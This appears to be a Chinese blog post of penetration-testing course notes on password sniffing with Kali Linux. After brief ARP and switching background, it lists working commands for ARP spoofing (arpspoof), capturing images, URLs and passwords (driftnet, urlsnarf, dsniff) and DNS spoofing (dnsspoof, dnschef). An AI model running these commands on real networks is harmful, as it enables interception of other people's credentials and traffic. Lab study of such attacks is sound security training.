Kali Linux渗透测试 107 密码嗅探
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试(苑房弘)博客记录1. 密码嗅探1. 简介二、三层地址IP 网络到网络MAC 主机到主机交换机与HUBHUB全端口转发交换机根据学习地址转发混杂模式抓包ARP协议免费ARP基于广播学习以太网头、ARP头请求、
·
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. 密码嗅探
1. 简介
-
二、三层地址
- IP 网络到网络
- MAC 主机到主机
-
交换机与HUB
- HUB全端口转发
- 交换机根据学习地址转发
- 混杂模式抓包
-
ARP协议
- 免费ARP
- 基于广播学习
- 以太网头、ARP头
- 请求、响应相对独立
- 基于传闻的协议
-
手动修改数据包实现ARP欺骗
- omnipeek
2. 手动欺骗并抓包
-
arp 欺骗
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward root@kali:~# arpspoof -t 10.10.10.133 -r 10.10.10.1
-
网络嗅探
# 实时显示图片 root@kali:~# driftnet -i eth0 # -a 不要在屏幕上显示图像,而是将其保存到一个临时目录中,并在标准输出上公布它们的名称。 # -d 指定目录 # -s 抓取声音 root@kali:~# driftnet -i eth0 -a -d testdir -s # 抓取 URL root@kali:~# webspy -i eth0 10.10.10.133 root@kali:~# urlsnarf -i eth0 # 嗅探密码 # -m:自动协议检测 root@kali:~# dsniff -i eth0 -m # 支持的协议类型 root@kali:~# cat /usr/lib/x86_64-linux-gnu/dsniff.services
# dns 欺骗 dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts
-
DNS欺骗代理
root@kali:~# dnschef --fakeip=10.10.10.2 --fakedomains=www.google.com,www.youtube.com --interface 10.10.10.131 -q root@kali:~# netstat -tulnp | grep 53
# 将被害者DNS指向伪造的DNS服务器
-
欺骗综合工具 PytheM
root@kali:~# git clone https://github.com/m4n3dw0lf/PytheM/ root@kali:~/PytheM# cat README.md
更多推荐
已为社区贡献11条内容
所有评论(0)